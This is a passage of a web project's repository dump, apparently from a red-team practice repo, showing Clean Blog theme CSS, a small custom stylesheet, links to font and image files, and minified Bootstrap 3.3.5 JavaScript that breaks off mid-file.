.intro-header .page-heading h1 { 179 | font-size: 80px; 180 | } 181 | } 182 | .intro-header .post-heading h1 { 183 | font-size: 35px; 184 | } 185 | .intro-header .post-heading .subheading, 186 | .intro-header .post-heading .meta { 187 | line-height: 1.1; 188 | display: block; 189 | } 190 | .intro-header .post-heading .subheading { 191 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 192 | font-size: 24px; 193 | margin: 10px 0 30px; 194 | font-weight: 600; 195 | } 196 | .intro-header .post-heading .meta { 197 | font-family: 'Lora', 'Times New Roman', serif; 198 | font-style: italic; 199 | font-weight: 300; 200 | font-size: 20px; 201 | } 202 | .intro-header .post-heading .meta a { 203 | color: white; 204 | } 205 | @media only screen and (min-width: 768px) { 206 | .intro-header .post-heading h1 { 207 | font-size: 55px; 208 | } 209 | .intro-header .post-heading .subheading { 210 | font-size: 30px; 211 | } 212 | } 213 | .post-preview > a { 214 | color: #404040; 215 | } 216 | .post-preview > a:hover, 217 | .post-preview > a:focus { 218 | text-decoration: none; 219 | color: #0085a1; 220 | } 221 | .post-preview > a > .post-title { 222 | font-size: 30px; 223 | margin-top: 30px; 224 | margin-bottom: 10px; 225 | } 226 | .post-preview > a > .post-subtitle { 227 | margin: 0; 228 | font-weight: 300; 229 | margin-bottom: 10px; 230 | } 231 | .post-preview > .post-meta { 232 | color: #808080; 233 | font-size: 18px; 234 | font-style: italic; 235 | margin-top: 0; 236 | } 237 | .post-preview > .post-meta > a { 238 | text-decoration: none; 239 | color: #404040; 240 | } 241 | .post-preview > .post-meta > a:hover, 242 | .post-preview > .post-meta > a:focus { 243 | color: #0085a1; 244 | text-decoration: underline; 245 | } 246 | @media only screen and (min-width: 768px) { 247 | .post-preview > a > .post-title { 248 | font-size: 36px; 249 | } 250 | } 251 | .section-heading { 252 | font-size: 36px; 253 | margin-top: 60px; 254 | font-weight: 700; 255 | } 256 | .caption { 257 | text-align: center; 258 | font-size: 14px; 259 | padding: 10px; 260 | font-style: italic; 261 | margin: 0; 262 | display: block; 263 | border-bottom-right-radius: 5px; 264 | border-bottom-left-radius: 5px; 265 | } 266 | footer { 267 | padding: 50px 0 65px; 268 | } 269 | footer .list-inline { 270 | margin: 0; 271 | padding: 0; 272 | } 273 | footer .copyright { 274 | font-size: 14px; 275 | text-align: center; 276 | margin-bottom: 0; 277 | } 278 | .floating-label-form-group { 279 | font-size: 14px; 280 | position: relative; 281 | margin-bottom: 0; 282 | padding-bottom: 0.5em; 283 | border-bottom: 1px solid #eeeeee; 284 | } 285 | .floating-label-form-group input, 286 | .floating-label-form-group textarea { 287 | z-index: 1; 288 | position: relative; 289 | padding-right: 0; 290 | padding-left: 0; 291 | border: none; 292 | border-radius: 0; 293 | font-size: 1.5em; 294 | background: none; 295 | box-shadow: none !important; 296 | resize: none; 297 | } 298 | .floating-label-form-group label { 299 | display: block; 300 | z-index: 0; 301 | position: relative; 302 | top: 2em; 303 | margin: 0; 304 | font-size: 0.85em; 305 | line-height: 1.764705882em; 306 | vertical-align: middle; 307 | vertical-align: baseline; 308 | opacity: 0; 309 | -webkit-transition: top 0.3s ease,opacity 0.3s ease; 310 | -moz-transition: top 0.3s ease,opacity 0.3s ease; 311 | -ms-transition: top 0.3s ease,opacity 0.3s ease; 312 | transition: top 0.3s ease,opacity 0.3s ease; 313 | } 314 | .floating-label-form-group::not(:first-child) { 315 | padding-left: 14px; 316 | border-left: 1px solid #eeeeee; 317 | } 318 | .floating-label-form-group-with-value label { 319 | top: 0; 320 | opacity: 1; 321 | } 322 | .floating-label-form-group-with-focus label { 323 | color: #0085a1; 324 | } 325 | form .row:first-child .floating-label-form-group { 326 | border-top: 1px solid #eeeeee; 327 | } 328 | .btn { 329 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 330 | text-transform: uppercase; 331 | font-size: 14px; 332 | font-weight: 800; 333 | letter-spacing: 1px; 334 | border-radius: 0; 335 | padding: 15px 25px; 336 | } 337 | .btn-lg { 338 | font-size: 16px; 339 | padding: 25px 35px; 340 | } 341 | .btn-default:hover, 342 | .btn-default:focus { 343 | background-color: #0085a1; 344 | border: 1px solid #0085a1; 345 | color: white; 346 | } 347 | .pager { 348 | margin: 20px 0 0; 349 | } 350 | .pager li > a, 351 | .pager li > span { 352 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 353 | text-transform: uppercase; 354 | font-size: 14px; 355 | font-weight: 800; 356 | letter-spacing: 1px; 357 | padding: 15px 25px; 358 | background-color: white; 359 | border-radius: 0; 360 | } 361 | .pager li > a:hover, 362 | .pager li > a:focus { 363 | color: white; 364 | background-color: #0085a1; 365 | border: 1px solid #0085a1; 366 | } 367 | .pager .disabled > a, 368 | .pager .disabled > a:hover, 369 | .pager .disabled > a:focus, 370 | .pager .disabled > span { 371 | color: #808080; 372 | background-color: #404040; 373 | cursor: not-allowed; 374 | } 375 | ::-moz-selection { 376 | color: white; 377 | text-shadow: none; 378 | background: #0085a1; 379 | } 380 | ::selection { 381 | color: white; 382 | text-shadow: none; 383 | background: #0085a1; 384 | } 385 | img::selection { 386 | color: white; 387 | background: transparent; 388 | } 389 | img::-moz-selection { 390 | color: white; 391 | background: transparent; 392 | } 393 | body { 394 | webkit-tap-highlight-color: #0085a1; 395 | } 396 | -------------------------------------------------------------------------------- /knasty/static/css/clean-blog.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Clean Blog v1.0.0 (http://startbootstrap.com) 3 | * Copyright 2014 Start Bootstrap 4 | * Licensed under Apache 2.0 (https://github.com/IronSummitMedia/startbootstrap/blob/gh-pages/LICENSE) 5 | */ 6 | 7 | body{font-family:Lora,'Times New Roman',serif;font-size:20px;color:#404040}p{line-height:1.5;margin:30px 0}p a{text-decoration:underline}h1,h2,h3,h4,h5,h6{font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;font-weight:800}a{color:#404040}a:hover,a:focus{color:#0085a1}a img:hover,a img:focus{cursor:zoom-in}blockquote{color:gray;font-style:italic}hr.small{max-width:100px;margin:15px auto;border-width:4px;border-color:#fff}.navbar-custom{position:absolute;top:0;left:0;width:100%;z-index:3;font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif}.navbar-custom .navbar-brand{font-weight:800}.navbar-custom .nav li a{text-transform:uppercase;font-size:12px;font-weight:800;letter-spacing:1px}@media only screen and (min-width:768px){.navbar-custom{background:0 0;border-bottom:1px solid transparent}.navbar-custom .navbar-brand{color:#fff;padding:20px}.navbar-custom .navbar-brand:hover,.navbar-custom .navbar-brand:focus{color:rgba(255,255,255,.8)}.navbar-custom .nav li a{color:#fff;padding:20px}.navbar-custom .nav li a:hover,.navbar-custom .nav li a:focus{color:rgba(255,255,255,.8)}}@media only screen and (min-width:1170px){.navbar-custom{-webkit-transition:background-color .3s;-moz-transition:background-color .3s;transition:background-color .3s;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);transform:translate3d(0,0,0);-webkit-backface-visibility:hidden;backface-visibility:hidden}.navbar-custom.is-fixed{position:fixed;top:-61px;background-color:rgba(255,255,255,.9);border-bottom:1px solid #f2f2f2;-webkit-transition:-webkit-transform .3s;-moz-transition:-moz-transform .3s;transition:transform .3s}.navbar-custom.is-fixed .navbar-brand{color:#404040}.navbar-custom.is-fixed .navbar-brand:hover,.navbar-custom.is-fixed .navbar-brand:focus{color:#0085a1}.navbar-custom.is-fixed .nav li a{color:#404040}.navbar-custom.is-fixed .nav li a:hover,.navbar-custom.is-fixed .nav li a:focus{color:#0085a1}.navbar-custom.is-visible{-webkit-transform:translate3d(0,100%,0);-moz-transform:translate3d(0,100%,0);-ms-transform:translate3d(0,100%,0);-o-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}.intro-header{background-color:gray;background:no-repeat center center;background-attachment:scroll;-webkit-background-size:cover;-moz-background-size:cover;background-size:cover;-o-background-size:cover;margin-bottom:50px}.intro-header .site-heading,.intro-header .post-heading,.intro-header .page-heading{padding:100px 0 50px;color:#fff}@media only screen and (min-width:768px){.intro-header .site-heading,.intro-header .post-heading,.intro-header .page-heading{padding:150px 0}}.intro-header .site-heading,.intro-header .page-heading{text-align:center}.intro-header .site-heading h1,.intro-header .page-heading h1{margin-top:0;font-size:50px}.intro-header .site-heading .subheading,.intro-header .page-heading .subheading{font-size:24px;line-height:1.1;display:block;font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;font-weight:300;margin:10px 0 0}@media only screen and (min-width:768px){.intro-header .site-heading h1,.intro-header .page-heading h1{font-size:80px}}.intro-header .post-heading h1{font-size:35px}.intro-header .post-heading .subheading,.intro-header .post-heading .meta{line-height:1.1;display:block}.intro-header .post-heading .subheading{font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:24px;margin:10px 0 30px;font-weight:600}.intro-header .post-heading .meta{font-family:Lora,'Times New Roman',serif;font-style:italic;font-weight:300;font-size:20px}.intro-header .post-heading .meta a{color:#fff}@media only screen and (min-width:768px){.intro-header .post-heading h1{font-size:55px}.intro-header .post-heading .subheading{font-size:30px}}.post-preview>a{color:#404040}.post-preview>a:hover,.post-preview>a:focus{text-decoration:none;color:#0085a1}.post-preview>a>.post-title{font-size:30px;margin-top:30px;margin-bottom:10px}.post-preview>a>.post-subtitle{margin:0;font-weight:300;margin-bottom:10px}.post-preview>.post-meta{color:gray;font-size:18px;font-style:italic;margin-top:0}.post-preview>.post-meta>a{text-decoration:none;color:#404040}.post-preview>.post-meta>a:hover,.post-preview>.post-meta>a:focus{color:#0085a1;text-decoration:underline}@media only screen and (min-width:768px){.post-preview>a>.post-title{font-size:36px}}.section-heading{font-size:36px;margin-top:60px;font-weight:700}.caption{text-align:center;font-size:14px;padding:10px;font-style:italic;margin:0;display:block;border-bottom-right-radius:5px;border-bottom-left-radius:5px}footer{padding:50px 0 65px}footer .list-inline{margin:0;padding:0}footer .copyright{font-size:14px;text-align:center;margin-bottom:0}.floating-label-form-group{font-size:14px;position:relative;margin-bottom:0;padding-bottom:.5em;border-bottom:1px solid #eee}.floating-label-form-group input,.floating-label-form-group textarea{z-index:1;position:relative;padding-right:0;padding-left:0;border:none;border-radius:0;font-size:1.5em;background:0 0;box-shadow:none!important;resize:none}.floating-label-form-group label{display:block;z-index:0;position:relative;top:2em;margin:0;font-size:.85em;line-height:1.764705882em;vertical-align:middle;vertical-align:baseline;opacity:0;-webkit-transition:top .3s ease,opacity .3s ease;-moz-transition:top .3s ease,opacity .3s ease;-ms-transition:top .3s ease,opacity .3s ease;transition:top .3s ease,opacity .3s ease}.floating-label-form-group::not(:first-child){padding-left:14px;border-left:1px solid #eee}.floating-label-form-group-with-value label{top:0;opacity:1}.floating-label-form-group-with-focus label{color:#0085a1}form .row:first-child .floating-label-form-group{border-top:1px solid #eee}.btn{font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;text-transform:uppercase;font-size:14px;font-weight:800;letter-spacing:1px;border-radius:0;padding:15px 25px}.btn-lg{font-size:16px;padding:25px 35px}.btn-default:hover,.btn-default:focus{background-color:#0085a1;border:1px solid #0085a1;color:#fff}.pager{margin:20px 0 0}.pager li>a,.pager li>span{font-family:'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;text-transform:uppercase;font-size:14px;font-weight:800;letter-spacing:1px;padding:15px 25px;background-color:#fff;border-radius:0}.pager li>a:hover,.pager li>a:focus{color:#fff;background-color:#0085a1;border:1px solid #0085a1}.pager .disabled>a,.pager .disabled>a:hover,.pager .disabled>a:focus,.pager .disabled>span{color:gray;background-color:#404040;cursor:not-allowed}::-moz-selection{color:#fff;text-shadow:none;background:#0085a1}::selection{color:#fff;text-shadow:none;background:#0085a1}img::selection{color:#fff;background:0 0}img::-moz-selection{color:#fff;background:0 0}body{webkit-tap-highlight-color:#0085a1} 8 | -------------------------------------------------------------------------------- /knasty/static/css/style.css: -------------------------------------------------------------------------------- 1 | body { font-family: sans-serif; background: #eee; } 2 | a, h1, h2 { color: #377ba8; } 3 | h1, h2 { font-family: 'Georgia', serif; margin: 0; } 4 | h1 { border-bottom: 2px solid #eee; } 5 | h2 { font-size: 1.2em; } 6 | 7 | .page { margin: 2em auto; width: 35em; border: 5px solid #ccc; 8 | padding: 0.8em; background: white; } 9 | .entries { list-style: none; margin: 0; padding: 0; } 10 | .entries li { margin: 0.8em 1.2em; } 11 | .entries li h2 { margin-left: -1em; } 12 | .add-entry { font-size: 0.9em; border-bottom: 1px solid #ccc; } 13 | .add-entry dl { font-weight: bold; } 14 | .metanav { text-align: right; font-size: 0.8em; padding: 0.3em; 15 | margin-bottom: 1em; background: #fafafa; } 16 | .flash { background: #cee5F5; padding: 0.5em; 17 | border: 1px solid #aacbe2; } 18 | .error { background: #f0d6d6; padding: 0.5em; } -------------------------------------------------------------------------------- /knasty/static/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /knasty/static/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /knasty/static/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /knasty/static/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /knasty/static/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/1.png -------------------------------------------------------------------------------- /knasty/static/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/2.png -------------------------------------------------------------------------------- /knasty/static/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/3.png -------------------------------------------------------------------------------- /knasty/static/img/about-bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/about-bg.jpg -------------------------------------------------------------------------------- /knasty/static/img/contact-bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/contact-bg.jpg -------------------------------------------------------------------------------- /knasty/static/img/home-bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/home-bg.jpg -------------------------------------------------------------------------------- /knasty/static/img/khaled.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/khaled.jpg -------------------------------------------------------------------------------- /knasty/static/img/post-bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/post-bg.jpg -------------------------------------------------------------------------------- /knasty/static/img/post-sample-image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/img/post-sample-image.jpg -------------------------------------------------------------------------------- /knasty/static/js/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.5 (http://getbootstrap.com) 3 | * Copyright 2011-2015 Twitter, Inc. 4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){return a(b.target).is(this)?b.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.5",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a(f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.5",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target);d.hasClass("btn")||(d=d.closest(".btn")),b.call(d,"toggle"),a(c.target).is('input[type="radio"]')||a(c.target).is('input[type="checkbox"]')||c.preventDefault()}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.5",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));return a>this.$items.length-1||0>a?void 0:this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){return this.sliding?void 0:this.slide("next")},c.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.5",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger("hidden.bs.dropdown",f))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.5",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger("shown.bs.dropdown",h)}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
